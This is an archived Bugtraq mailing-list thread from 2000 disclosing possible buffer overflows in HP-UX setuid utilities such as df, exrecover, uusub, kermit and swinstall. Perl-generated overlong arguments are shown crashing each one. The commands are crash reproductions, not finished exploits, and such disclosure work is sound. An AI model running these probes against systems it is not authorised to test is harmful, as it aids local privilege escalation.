Bugtraq
mailing list archives
Re: Possible vulnerability in HPUX ( Add vulnerability List )
From: ??? <loveyou () hackerslab org>
Date: Thu, 10 Aug 2000 13:36:50 +0900
Hi..
SYSTEM : HP-UX neptune B.11.00 A 9000/785
Memory fault vulnerability list
---------------------------------
/usr/bin/cancel `perl -e 'print "x" x 6080'` -ua
Memory fault
/bin/lpstat `perl -e 'print "x" x 185'`
Memory fault
$ kermit -y `perl -e 'print "x" x 5085'`
[/home/loveyou] C-Kermit>q
Memory fault(coredump)
$ kermit -x `perl -e 'print "x" x 222'`
Executing /usr/share/lib/kermit/ckermit.ini for UNIX...
Good Evening.
Memory fault(coredump)
/usr/sbin/swinstall -s `perl -e 'print "x" x 5085'`
/usr/sbin/swpackage -x `perl -e 'print "x" x 5085'`
Memory fault
/usr/sbin/swcopy -s `perl -e 'print "x" x 5085'`
/usr/sbin/swask -s `perl -e 'print "x" x 5000'`
/usr/dt/bin/dtterm -tn `perl -e 'print "x" x 1019'`
/bin/rlogin `perl -e 'print "x" x 17080'` -l loveyou
:-)
by loveyou ( loveyou () hackerslab org )
----- Original Message -----
From: "Quentin GIORGI" <qgiorgi () SANCERRE GRENOBLE HP COM>
To: <BUGTRAQ () SECURITYFOCUS COM>
Sent: Wednesday, August 09, 2000 4:31 PM
Subject: Possible vulnerability in HPUX
Hello,
A few days ago I read the mail "[ Hackerslab bug_paper ] HP-UX bdf -t
option buffer overflow vul." and decided to look for any other possible
vulnerability(ies) on my system (HP-UX 10.20).
After a *few* minutes ( maybe a little more :) ), trying each setuid exe
with different options, I finally got results as for bdf:
My basic knowledge tells me that it could be exploitable, but as I am
not a PA RISC assembly expert, I let anyone decide.
I have a quick query on the database vulnerability and can't see
anything about this on HPUX, but...
df:
---
sancerre: /home/qgiorgi>ll `which df`
-r-sr-xr-x 1 root bin 69632 Jun 10 1996 /usr/bin/df
sancerre: /home/qgiorgi>df -F `perl -e "print 't'x3631"`
df: ttt <skip> ttt : No such file or directory
usage : df [-F FStype] [-V] [-egiklnvfb] [-t|-P] [-o specific_options]
[special | directory ...]
sancerre: /home/qgiorgi>df -F `perl -e "print 't'x3632"`
Segmentation fault
exrecover:
--------
sancerre: /home/qgiorgi>ll `which exrecover`
-r-sr-xr-x 1 root bin 20480 May 30 1996 /usr/lbin/exrecover
sancerre: /home/qgiorgi>exrecover anythingUwant `perl -e "print 't'x4703"`
File not found
sancerre: /home/qgiorgi>exrecover anythingUwant `perl -e "print 't'x4704"`
Segmentation fault
And eventually, but it is owned by uucp; I think it's less interesting.
uusub:
-----
sancerre: /home/qgiorgi>ll `which uusub`
-r-sr-xr-x 1 uucp bin 32768 May 30 1996 /usr/lib/uucp/uusub
sancerre: /home/qgiorgi>uusub -a `perl -e "print 't'x212"`
sancerre: /home/qgiorgi>
sancerre: /home/qgiorgi>uusub -a `perl -e "print 't'x213"`
Segmentation fault
I also tried this on HPUX 11.00 (9911)
uusub works with length of 225
exrecover works with length > 2700
I hope this could help.
---------------------------------------------------------------------------
Quentin GIORGI
Network Engineer
E.I.C IDA
---------------------------------------------------------------------------